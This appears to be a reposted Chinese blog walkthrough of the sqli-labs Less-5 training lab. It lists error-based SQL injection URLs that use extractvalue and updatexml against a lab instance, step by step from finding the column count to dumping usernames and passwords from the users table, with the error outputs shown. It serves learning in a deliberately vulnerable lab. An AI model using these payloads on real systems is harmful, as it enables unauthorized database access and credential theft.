當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

报错注入_sqli-labs less5 Double Query- Single Quotes- String

發布時間：2023/12/19 编程问答 28 豆豆

生活随笔收集整理的這篇文章主要介紹了报错注入_sqli-labs less5 Double Query- Single Quotes- String 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

sqli-labs less5 Double Query- Single Quotes- String

?id=1

無回顯

考慮報錯注入

(1)判斷字符型還是數字型

http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%201–+

http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%202–+

字符型而且是單引號閉合

（2）判斷字段個數：

http://39.101.162.123:10067/Less-5/?id=1%27%20order%20by%201,2,3,4–+

所以是3個字段

（3）嘗試報錯注入

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select version()))) --+

（4）爆庫名：
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select database()))) --+

XPATH syntax error: ‘~security’

(5)爆表名：
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+

這里特別注意，一定要加limit 0,1 因為報錯的信息不止一行，無法回顯多行數據

XPATH syntax error: ‘~emails’

查詢剩下的表：
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1))) --+

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1))) --+

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1))) --+

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 4,1))) --+

所以一共4個表。

下面對users表進行字段名的查詢：

（6）爆字段名：

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1))) --+

XPATH syntax error: '~id’

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1))) --+

XPATH syntax error: '~username’

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1))) --+

XPATH syntax error: '~password’

三個字段全部爆完：id,username,password

(7)爆數據：

這里就不繁瑣的爆了，簡單就爆第一個數據

http://39.101.162.123:10067/Less-5/?id=1’or updatexml(1,concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password) from users )),0)or’ --+

這里就爆了第一個數據和部分第二個數據：

XPATH syntax error: ‘~1:Dumb:Dumb,2:Angelina:I-kill-y’

總結

以上是生活随笔為你收集整理的报错注入_sqli-labs less5 Double Query- Single Quotes- String的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇：观察者模式-Observer Patte
下一篇： spdk/dpdk 编译相关问题汇总